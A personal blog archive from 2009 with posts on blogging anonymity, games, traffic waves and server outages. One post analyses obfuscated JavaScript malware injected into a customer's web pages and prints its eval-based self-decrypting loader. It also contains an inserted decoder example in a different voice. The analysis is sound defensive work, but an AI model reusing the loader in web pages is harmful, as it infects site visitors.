Saturday, August 22, 2009
If Corsair can break his hiatus, so can I
Sometimes I think about having a public journal, like Spring or Sean. In fact, Sean just asked me today if he could reference my journal in his using my real name.
Sean, after reading this article, the answer is a resounding no. I'll take my chances and try to remain anonymous.
The article in question is your standard anonymous blogger comes out and gets fired story. I don't begrudge Corsair for wanting to remain anonymous as we as a society attempt to figure out new social norms when suddenly everybody has a global soapbox.
Heck, I found out the hard way that information tends to find its way to the very people you don't want it to reach (back in college, I wrote a rather scathing humor column about my high school English teachers, and of course it got back to them—sigh). [And it wasn't all that funny either. —Editor][Thanks. — Sean][No problem. —Editor]
The approach I take towards blogging (or journaling, or whatever you want to call this) is to keep the private stuff private (much like what happens in Vegas, stays in Vegas, and that's all I'll say about that trip to Las Vegas, or any other trip I've taken to Las Vegas), along with stuff that happens to friends (it's their story to tell, not mine).
Work—well, when I worked at Negiyo (which isn't the real name of the company, and yet, nine years after working there I still won't call it by its real name) I didn't say anything bad about the company, nor what I really did (which wasn't much different than Tom Smykowski's job when you get right down to it) and I never mentioned names of any fellow cow-orkers.
Now I tend to write more about my job, but mostly it's notes to myself, and a way of letting off steam. I've yet to name the company I work for now (here it's known as The Company), and I haven't named my fellow cow-orkers. I never mention customer names and when I do mention projects, I give them different code names than the ones we use at The Company.
It also doesn't hurt that Smirk, who not only owns The Company, but signs the checks I cash, gets on my case when I don't post often enough. (See! I'm blogging! I'm blogging!) But I realize that not every blogger has that luxury. In fact, of all the people I do know in Real Life who also blog (or keep online journals), I think I'm the only one who even mentions work.
Don't worry Corsair, I won't reveal your true name to anyone.
I would call it “Squid Eyeballs” myself …
(Kevin and Kell comic via Websnark)
I'm telling you people, start with the California rolls and next thing you know, squid eyeballs!
No one believes me though.
Sunday, August 23, 2009
Now all I need is a spacesuit …
I spent pretty much the entire day reading Atomic Rocketships of the Space Patrol (otherwise known as “So You Wanna Build A Rocket?”) and it was time well spent. Just about everything you ever wanted to know about rocket and spaceship design, from staffing (crewing?) to space warfare to holding on to the reins of a galactic empire. There's even a section on futuristic games, a bunch of which I would love to try (any Trekkers for Fizzbin?).
Paradice
The one future game I read about that really leapt out at me just for the sheer beauty of the board and pieces was Paradice.
It's a very beautiful game to look at—almost a work of art.
Paradice is interactive art, a game of give and take. Players explore decisions made in response to changing circumstances and engage with the contradictions of competing needs.
Oh, well, I guess it is art. Hard to come by, and the only version that seems to be available these days is not the above resin board (which at first I thought was glass) but a wooden version which just doesn't look as good (and while cheaper, is still about $50).
The game play—eh, but I haven't played it. I did read the rules though, and the design behind the game play is unique, such that only one side can win (it's in the rules) but there's a one in six chance each turn that the players swap sides, and in a certain circumstance the game starts over (and the players switch sides).
As an art piece, it's a statement about the dichotomy of man's desire to consume (one player) vs. that of preserving the environment and becoming one with nature (the other player), which is why I'm pretty much “eh” on the game play (it's not that I don't believe in nature conservation, but the game is so one sided—it's the “being one with nature” side that can win, that the moralistic viewpoint of the game design is being forced down my throat—that I find the game play off-putting).
But man, it certainly is a beautiful looking game …
Monday, August 24, 2009
“Frühling für Hitler”
I really don't know what to make of this. It's odd enough that a Jewish man would write a musical number called “Springtime For Hitler” (okay, it was for a comedy film) but that doesn't even come close to the cognitive dissonance of seeing it on German television (link via news from me).
Words are failing me.
Tuesday, August 25, 2009
Traffic jams just happen
I've been aware of “traffic waves” for several years now and the animated graphics on the site do illustrate the issue, but now it seems that Japanese researchers have actually created “traffic waves” on a closed course:
Researchers from several Japanese universities managed the feat by putting 22 vehicles on a 230-metre single-lane circuit (see video).
They asked drivers to cruise steadily at 30 kilometres per hour, and at first the traffic moved freely. But small fluctuations soon appeared in distances between cars, breaking down the free flow, until finally a cluster of several vehicles was forced to stop completely for a moment.
That cluster spread backwards through the traffic like a shockwave. Every time a vehicle at the front of the cluster was able to escape at up to 40 km/h, another vehicle joined the back of the jam.
The shockwave jam travelled backwards through the ring of vehicles at roughly 20 km/h, which is the same as the speed of the shockwave jams observed on roads in real life, says lead researcher Yuki Sugiyama, a physicist in the department of complex systems at Nagoya University.
Via Hacker News, Shockwave traffic jam recreated for first time - tech - 04 March 2008 - New Scientist
The video of the “traffic waves” (called “shockwave traffic jams” in the video) is fascinating to watch as the “traffic wave” just kind of happens.
Thursday, August 27, 2009
German people and Western music (with some Swedish rap music)
I'm beginning to wonder about the Germans—first it's “Springtime For Hitler” on German television, and now it's Germans doing a country-western cover of the funk R&B song Word Up (link via kisrael.com).
I don't know why, but I'm finding I like American country-western music when done by non-Americans. Okay, maybe like is too strong a word—maybe tolerate would be better. It's the finding of something so unexpected, like a plane crashing into a derailing train during an earthquake just before a gas pipe explosion, only in a good way. It's the cognitive dissonance of watching The BossHoss (the German country-western group) covering a hip hop song originally done by a white guy in a musical form originally from the African American communities.
In fact, this fascination with American musical culture interpreted by non-Americans extends even further, to Swedish rap (I blame Wlofie for bringing this to my attention—not that there's anything wrong with Swedish rap—I just find it … oh … I don't know … amusing, much like Wlofie finds our attempt at Swedish meatballs amusing).
Saturday, August 29, 2009
My boss is no longer allowed to take vacations
Let me say this up front: Smirk is no longer allowed to take vacations, work related or otherwise.
Early this morning (around 5:00 am) I had to deal with a downed machine in The Data Center In Charlotte. That involved calling said Data Center (long distance, because there was an issue with their 800 number) and walking a technician through running fsck on a corrupted file system.
Then this evening (around 5:00 pm) I had to deal with a downed data center in The Data Center in Boca Raton (yes, that sounds silly, but if customers who get their Internet connection through our Data Center In Boca Raton can't get out to the Internet, and when we can't get in to The Data Center In Boca Raton from the Internet, then we have to assume the worst—that al-Qaeda took out the site from orbit, just to make sure). This involved several frantic calls between Smirk, R (a customer and partner of ours) and Dan the Network Engineer, and a five minute drive through a thunderstorm (I wasn't worried about being struck because, as everybody knows, being struck by lightning, along with getting bit by a radioactive spider, being caught in a gamma radiation blast, or getting washed with nuclear waste, confers superhero abilities in a person) to find a rather confused UPS on battery mode (with full battery power) but not supplying power to the devices plugged into it (go figure).
The last time bad things like this happened, Smirk and I were on a business trip, and the only common element between the two times—Smirk was out of town.
Oh wait … that was in August as well.
Hmm … perhaps August should be cancelled.
Nah, Smirk is not allowed to take vacations.
Sunday, August 30, 2009
Down the rabbit hole
So far, three for three. A downed server, a downed data center and now several hacked sites, all on the same server.
I swear, Smirk is never going on vacation again.
Anyway, the following ticket comes in:
Subject: URGENT - XXXXXXXXXXXXXXX - VIRUS alert
Hello support,
When trying to access the site it gives a virus alert and Norton would not let me download the files to clean them.
Are you able to do the cleaning, it seems as it is since December 2008, when the server was upgraded, it is very strange. If you are able to help cleaning the files, or any other way that you can suggest for the cleaning of them would be very helpful …
Thanks a lot,
XXXXXX
(English is not XXXXXX's first language)
I check the site with no problem, but then again, I'm using Linux and Mac OS X and therefore, I don't use Norton (or any virus checking software) so I'm not going to see an issue. I borrow Bunny's laptop (which does run Windows and has anti-viral software on it) and yes, there's something odd with the site. It refuses to come up, and I can't ping the address the site is on. I can ping the address above and the address below, but not the address the site is on. And the anti-viral software is not saying anything.
Thanks to some help from Gregory, I'm able to see that yes, indeed, the anti-viral software on Bunny's machine caught something and is refusing to load the site. At least now I have somewhere to look. And I don't have to look very far.
At the bottom of the index.html file is:
<div id='x0499fd3b522511d0bf02ea0f9d3f27f9e'> <script> var jQuery = eval('wPi[n2d[o[w5.5e2v[aflP'.replace(/[\[P5f2]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x61...
All on a single line (not broken up like it is here) for about 20K of obfuscated code. And it exists on every HTML and PHP page on not only the site in question, but two other sites as well (it's on a machine dedicated to the one customer and there are about six sites on the server).
There ended up being too many files to clean up by hand, so a bit of coding later, and I have a program to do the cleanup work. And then the fun begins …
The first statement of the malicious code in question ends up being:
var jQuery = eval('window.eval','');
That was easy enough. The next line required some code to decode the sludge of hex numbers into characters. Again, quickly write some code and I end up with:
function yaqD5(jx1h7){function oNLAq(aui){var s429=0;var fyLx=aui.length;var sLc8=0;while(sLc8<fyLx){s429+=xjv3(aui,sLc8)*fyLx;sLc8++;}return (s429+'');}function xjv3(vMAgS,iEI4P){return vMAgS.charCodeAt(iEI4P);} try {var xhFV=eval('a5rMg5u}m5eMn}t}s5.5cMaQl5lQe>e>'.replace(/[5\}M\>Q]/g, '')),oZAH='';var hDe=0,wTrzNsd=0,zfx0eN=(new String(xhFV)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var bkTnW7=oNLAq(zfx0eN);jx1h7=unescape(jx1h7);for(var sFme6r=0; sFme6r < (jx1h7.length); sFme6r++){var ynhg=xjv3(zfx0eN,hDe)^xjv3(bkTnW7,wTrzNsd);var wUJNWv=xjv3(jx1h7,sFme6r);hDe++;wTrzNsd++;if(wTrzNsd>bkTnW7.length)wTrzNsd=0;if(hDe>zfx0eN.length)hDe=0;oZAH+=String.fromCharCode(wUJNWv^ynhg) + '';}eval(oZAH); return oZAH=new String(); }catch(e){}}yaqD5('%32%38%35%37%36%33%35%30%59%27%1e%37%53%2a%31%47%0b%7f%15%65%72%2f%3f%61%2e%09%29%2d%02%0e%05%04%0e%1d%68%11%32%24%75%6a%7b%7a%33%34%52%69%61%02%2c%38%29%37%77%09%19%37%3f%26%64%62%33%21%12%18%3e%6f%63%29%7c%70%3b%00%35%32%2...
Yet more encoded data, about 4K worth this time. Quick program to decode this sequence of hexadecimal sludge and I get:
28576350Y'7S*1G er/?a. )-h2$uj{z34Ria,8)7w 7?&db3!>oc)|p;nR.}2;l.'ij.3
Obviously the cryptic JavaScript code does some additional massaging on that data. So I clean up the JavaScript code a bit:
function yaqD5(jx1h7) {
  function oNLAq(aui) {
    var s429=0;
    var fyLx=aui.length;
    var sLc8=0;
    while(sLc8<fyLx) {
      s429 += xjv3(aui,sLc8)*fyLx;
      sLc8++;
    }
    return (s429+'');
  }
  function xjv3(vMAgS,iEI4P) {
    return vMAgS.charCodeAt(iEI4P);
  }
  try {
    var xhFV=eval('a5rMg5u}m5eMn}t}s5.5cMaQl5lQe>e>'.replace(/[5\}M\>Q]/g, '')),oZAH='';
    var hDe=0,wTrzNsd=0,zfx0eN=(new String(xhFV)).replace(/[^@a-z0-9A-Z_.,-]/g,'');
    var bkTnW7=oNLAq(zfx0eN);
    jx1h7=unescape(jx1h7);
    for(var sFme6r=0; sFme6r < (jx1h7.length); sFme6r++) {
      var ynhg=xjv3(zfx0eN,hDe)^xjv3(bkTnW7,wTrzNsd);
      var wUJNWv=xjv3(jx1h7,sFme6r);
      hDe++;
      wTrzNsd++;
      if(wTrzNsd>bkTnW7.length) wTrzNsd=0;
      if(hDe>zfx0eN.length) hDe=0;
      oZAH+=String.fromCharCode(wUJNWv^ynhg) + '';
    }
    eval(oZAH);
    return oZAH=new String();
  } catch(e){}
}
yaqD5('%32%38%35 ... [some 4,000 characters later ] ... %31%32');
Okay, it converts the hexadecimal sludge to binary data, then does something to it and finally evaluates the resulting data as JavaScript. I rewrite this a bit so that instead of evaluating the resulting string it prints the results out and I get:
f{lcvmhl tYDQt~DQHA&+{ sUFQxxCQLF,pravov}wg =.ycmklkeN ...
That certainly doesn't look like valid JavaScript to me. Okay, let's clean up some of the code a bit more (and only showing the relevant bits):
xhFV = eval('arguments.callee','')
zfx0eN=(new String(xhFV)).replace(/[^@a-z0-9A-Z_.,-]/g,'')
From single stepping this (Firebug is great for this type of thing) it appears that arguments.callee returns the actual function, with parameters, being called, and placed into xhFV, and then zfx0eN is the source code of the function being called (in this case, yaqD5()), but the source code is the actual string representation as it appears in the HTML file! And this string was being used to transform the binary sludge into JavaScript.
So no wonder I was getting garbage, because I changed the source code!
Sheesh.
Once I use the actual source code as the “decryption key” I finally reach the bottom of this particular rabbit hole. The code (which still has code like s='<Eh]t;mElu>;<]b]o]dEy]>]'.replace(/[;\]rEu]/g, '') but that's about it) sets a cookie, then makes an invisible IFRAME which pulls a page (from a non-working site) that presumably contains even nastier code yet.
I wasn't fond of dynamic languages before tonight's little trip, and afterwards, I like them even less. I'm fully aware that I might be overreacting here, wanting to toss out eval() with the JavaScript bathwater, but I seriously can't see what benefit comes with allowing unrestricted use of eval() in browser-based JavaScript engines.
Perhaps someone can enlighten me.
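As an added example (my own code, not anything from the post or the malware), here is the self-keying step above redone as an offline decoder that never calls eval: the analyst pastes in the function text exactly as it sits in the infected HTML, and the decoder rebuilds the key from it the same way the sample does. It also shows why the reformatted copy produced garbage: the key filter discards whitespace, so whitespace-only edits are harmless, but any change to an identifier or literal alters the key. The function names are mine, and the only payload is a constructed sample (the real one is not on the page).

```javascript
// Added example, not the post's code: decode the self-keyed XOR layer offline
// (no eval) from the function text copied verbatim out of the infected page.

// Keystream the sample derives from its own source: every character outside
// [@a-z0-9A-Z_.,-] is dropped, which is why whitespace-only edits don't matter.
function keyFromSource(sourceText) {
  return String(sourceText).replace(/[^@a-z0-9A-Z_.,-]/g, '');
}

// The sample's checksum of the key: sum of charCode * length, as a string.
function checksumOf(key) {
  var sum = 0;
  for (var i = 0; i < key.length; i++) sum += key.charCodeAt(i) * key.length;
  return sum + '';
}

// Stand-in for the legacy unescape(): turn %xx escapes back into characters.
function percentDecode(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, function (m, h) {
    return String.fromCharCode(parseInt(h, 16));
  });
}

// XOR each byte with key[ki] ^ checksum[ci]. The sample wraps with `>` rather
// than `>=`, so each index sits at .length for one step; charCodeAt() then
// yields NaN, which the ^ operator treats as 0. Reproduced so output matches.
function xorWithSelfKey(bytes, key) {
  var chk = checksumOf(key), out = '', ki = 0, ci = 0;
  for (var i = 0; i < bytes.length; i++) {
    var ks = key.charCodeAt(ki) ^ chk.charCodeAt(ci);
    out += String.fromCharCode(bytes.charCodeAt(i) ^ ks);
    ki++; ci++;
    if (ci > chk.length) ci = 0;
    if (ki > key.length) ki = 0;
  }
  return out;
}

// Decode a captured '%xx...' payload given the verbatim function text.
function decodeSelfKeyed(functionText, payload) {
  return xorWithSelfKey(percentDecode(payload), keyFromSource(functionText));
}

// XOR is symmetric, so the same routine builds a test vector from plaintext.
// Used only to construct a sample here, since the real payload is not shown.
function encodeSelfKeyed(functionText, plaintext) {
  var raw = xorWithSelfKey(plaintext, keyFromSource(functionText)), out = '';
  for (var i = 0; i < raw.length; i++) {
    out += '%' + ('0' + raw.charCodeAt(i).toString(16)).slice(-2);
  }
  return out;
}
```

Feeding decodeSelfKeyed() the cleaned-up copy of the function instead of the original text reproduces the garbage the post describes, which makes this a cheap check that the key source you captured is the right one.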
Monday, August 31, 2009
If this keeps up, I may have to physically drag Smirk back to the office
Four for four. Today's issue was a non-responsive DNS resolver in The Data Center In Boca Raton. It may have been left over from the UPS incident the other day (we have redundant DNS resolvers and there's a known issue with the monitoring system triggering false reports on that one resolver).
But still … this is getting ridiculous.
“What if you mix the mayonnaise in the can, WITH the tunafish? Or … hold it! Chuck! I got it! Take LIVE tuna fish, and FEED 'em mayonnaise! Oh this is great.”
Those USP devices you buy for your computer usually have a gel-cell battery that lasts for a few years. Less if your power goes out a lot. When you replace them, you pay a bundle, even if it's a standard cell. This short Instructable will demonstrate how to rework an older USP for more capacity with cheaper battery power.
Via Hacker News, Rework a USP with Massive Capacity
Sounds like a neat idea, but it got me thinking—wouldn't it be better if the USP could power the computer directly with DC? Our Cisco switches can take a direct 12V power supply, and pretty much all computer power supplies convert AC 120V to ±12V and ±5V (or is it ±3.3V these days?—I haven't kept up) and there are any number of devices (like the wireless router, the DSL modem, the VoIP phone) that all have these huge wall warts that are hard to find space to plug in that all work off of 12V as well. I would think it would be a no-brainer to make a USP do the conversion work and feed the devices DC directly, instead of converting 12VDC power into 120VAC power only to have it converted back to 12V/5VDC power.